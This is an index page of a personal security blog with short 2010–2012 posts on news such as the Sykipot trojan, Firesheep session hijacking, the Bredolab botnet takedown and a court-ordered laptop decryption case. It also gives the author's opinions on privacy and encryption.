Hack The Planet

Because if you don't, who will?

Tuesday, January 24, 2012

Sykipot trojan steals US Military ID card data

A bit of old news, the Sykipot trojan has been modified by Chinese hackers to steal sensitive information off DoD networks by stealing the authentication information from DoD smart cards. The cards are commonly used to allow access to DoD networks using certificates and PIN’s for a more secure authentication. This Sykipot variant has been upgraded with a keylogger to steal the PIN’s, then use the certificate associated with the card to access protected networks. The hackers used a spearphishing campaign to deliver the trojan.

posted by holliday at 5:40 pm  

Monday, January 23, 2012

Full disk encryption may not save you from the law

A Colorado woman has been ordered by a judge to decrypt her laptop so that prosecutors can use the files on it against her. Judge Robert Blackburn said “I conclude that the Fifth Amendment is not implicated by requiring production of the unencrypted contents of the Toshiba Satellite M305 laptop computer.”

Apparently the fact that there was a jailhouse recording of the defendant, Ramona Fricosu, led the judge to believe there was evidence that there was information on the laptop that the prosecution was looking for. I understand that Assistant U.S. Attorney Patricia Davies, says that if the judge did not force her to give up her password that the terrorists would win. She didn’t actually say that. She said, “a concession to her and potential criminals (be it in child exploitation, national security, terrorism, financial crimes or drug trafficking cases) that encrypting all inculpatory digital evidence will serve to defeat the efforts of law enforcement officers to obtain such evidence through judicially authorized search warrants, and thus make their prosecution impossible.”

I just think that it is a leap to say that if the judge does not require Fricosu to give up her password that all of the bad people would immediately encrypt all of their information and that it would thwart our ability to prosecute them. Would it make it more difficult in some cases? Sure. But that is why it is the prosecutions job to have enough evidence to convict and not the defendants job to hand over any proof of wrong doing.

This is what the 5th Amendment was geared for and the judge is making a huge mistake. A mistake that favors the prosecution and government. How strange?

I would still encrypt your drives. Most OS’s now make it easy and if you don’t want to use the built-in tools you can always use TrueCrypt.

posted by holliday at 11:34 pm  

Tuesday, January 17, 2012

Cyberwar in the Middle East or Cyberslap-fight?

Hackers who claim to be from Israel, and Saudi Arabia have been taking swings at the stock exchange and financial hubs of each others countries. In the most recent hack pro-Israel hackers took the stock exchanges of Saudi Arabia and UAE offline for hours. The cyberattacks continue to escalate and it will be interesting to see where this ends, whether in more severe hacks or more tit for tat.

posted by holliday at 2:06 pm  

Tuesday, August 23, 2011

McAfee reacts to industry questioning

Well it was only a matter of time but after members of the security community questioned McAfee’s reaction to Operation Shady Rat (what marketing person came up with that?), McAfee has responded.

I find it interesting that after sitting on the information until the Black Hat USA conference to get as much marketing splash as possible that they were shocked when the industry didn’t find the attack that surprising or new. It was a persistant attack by an organized group, possibly a nation-state, that utilized a botnet (Yes, McAfee, Kaminsky was right in calling it a botnet).

There was nothing new in the report and that is why the industry responded. Calling everything an APT may make national news but it doesn’t make the attack new or different. If you want industry collaboration then don’t make it all about the marketing, make it about the information.

posted by holliday at 7:15 am  

Friday, July 15, 2011

Anonymity in a connected world

In a recent Network World article author Dave Keams postulated that in the connected world we live in that anonymity is viewed as odd and even suspicious. He uses an example of a girl who is trying to look up information on a possible suitor and can’t find anything. She views his lack of an online presence as a possible reason to not see him, even though in the physical world he seems quite the catch.

I find this very funny on two fronts. In our new, fully connected world we have lost our ability to connect without the use of technology. The second is that good internet habits are looked at as a negative because having your private life not splashed all over the digital tabloids that are Facebook, MySpace and other sites is not acceptable.

It reminds me of Orwell’s 1984 and some of the commentary that has come from it. Basically if you have nothing to hide then why aren’t you allowing strangers to view your every move. How the government has instituted draconian laws allowing them to listen in on all our citizens phone calls and read all of their email because again, why worry if you have nothing to hide.

It is a brave, new world but not necessarily a better one.

posted by holliday at 5:35 am  

Tuesday, December 21, 2010

God save the Queen

A bill abolishing the National Identity Scheme is expected to be passed into law on December 21st after receiving royal assent. Home office minister Damien Green wrote “Photographs, fingerprints and personal information that were submitted as part of the application process for an ID card will be destroyed within two months.”

It is nice to see a country moving to return some sanity and civil liberties to it’s citizens instead of continuing to turn into a police state.

posted by holliday at 11:51 am  

Wednesday, November 3, 2010

Learning from your mistakes

There is an interview with Marissa Mayer, a VP at Google, where the question was asked, “What have been Google’s biggest mistakes?” She answered that Wave, shutting down Dejanews and launching Gmail on April 1st (April Fools day) were the top three. I don’t want to focus on these though (shutting down Wave breaks my heart because it was great). I want to focus on what Google does really well. It learns from it’s mistakes and moves on quickly.

In my career I have worked at many start-ups and some of them have been acquired by large companies which retained me after the take over. When those companies took over you could actually feel the innovation and momentum just slow to a crawl. In a start-up you have to be fast, willing to change direction quickly and follow your instincts. If you don’t you fail. In larger organizations though it seems like it is frowned upon to challenge the status quo, to innovate or to create.

What Google does is different though (I don’t work there, never have and don’t know any one who does or has so this is an outside assumption). They build and test new ideas and if they fail to meet their standards they move on. But what they give you is some amazing functionality and great new ideas. Gmail, Google Earth, Wave (even though they are canceling it), Street View and Android. Any of these could have been done by another company but Google actually did them. They stepped up and tried it. Some of their ideas have failed, and some have cost them millions and millions of dollars but they continue to look for new ways to innovate and grow their business.

They aren’t afraid to fail and they even encourage it. Not that they want to fail or want their projects to fail but they actively learn from them and keep going out on a limb with new products and features. You can’t succeed if you don’t fail.

As Thomas Edison said “I have not failed. I’ve just found 10,000 ways that won’t work.” Don’t be afraid to fail. Be afraid of doing nothing.

posted by holliday at 9:33 am  

Monday, November 1, 2010

Firesheep – Because the name Firecow was taken

There are tons of posts on the new FireFox plugin, Firesheep. Firesheep is a plugin that allows you to hijack other user’s social network sessions that are using the same wired or wireless network as you are. Eric Butler, one of the co-authors, has a post explaining how Firesheep works.

The basics of the attack are that websites like Facebook use something called “cookies” to authenticate a user that has already logged in so that the site does not have to ask the user to login again until the cookie expires. The issue is that while the sites often encrypt the initial login they don’t often encrypt any additional network traffic which allows an attacker to capture the cookie and allows them to gain access to victim’s account.

To protect yourself from this type of attack you should always maintain an encrypted session with any of your social network sites. Some folks say not to connect to these sites at all on public WiFi but in general you are better off treating every network as untrusted or hostile and just encrypt your network traffic. You can use the Force-TLS or HTTPS-Everywhere plugins, though they may not work on every site.

The slides for Firesheep from Toorcon are here.

posted by holliday at 3:17 pm  

Friday, October 29, 2010

Nobel Peace Prize website delivering malware

A Firefox 0-day vulnerability is being used to vend malware from the official website for the Nobel Peace Prize. Norman ASA detection executive Einar Oftedal stated in an instant message to the Register, “This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11, we didn’t see any 0day for IE.” The malware does not target Windows Vista, or 7 systems, limiting the attack to only Windows XP users running Firefox 3.6.11 or earlier.

Mozilla is aware of the vulnerability and is working on a fix that will most likely be out later this week once it has been tested. This attack is most likely not limited to the Nobel Peace Prize website and users of Mozilla’s Firefox can protect themselves from this attack by using NoScript or disabling JavaScript in their browser.

Some theorize the attack is related to the Nobel Peace Prize being awared to Liu Xiaobo this year, who is incarcerated in China for his participation in Chapter 08.

posted by holliday at 11:51 am  

Friday, October 29, 2010

Bredolab botnet neutered, not dead yet

Dutch authorities in conjunction with network security organizations have taken control of and started dismantling 143 command and control servers used by the Bredolab botnet. The Bredolab botnet had infected an estimated 30 million computers during its time and was reportedly used in a phishing scam last year against Facebook users.

A 27 year old suspect was arrested a little while later after trying to regain control of the botnet and then trying use it to DDOS the web hosting firm Leaseweb that was being used by the hacker.

While the majority of the CnC servers have been taken offline there are still some alive and kicking.

One of the more interesting pieces to me is that the Fox-IT team who is working with the Dutch authorities, are contacting the infected machines users when they log on of the infection and how to remedy it. At the posting of this over 100,000 users have been notified.

posted by holliday at 11:08 am  
« Previous PageNext Page »

Powered by WordPress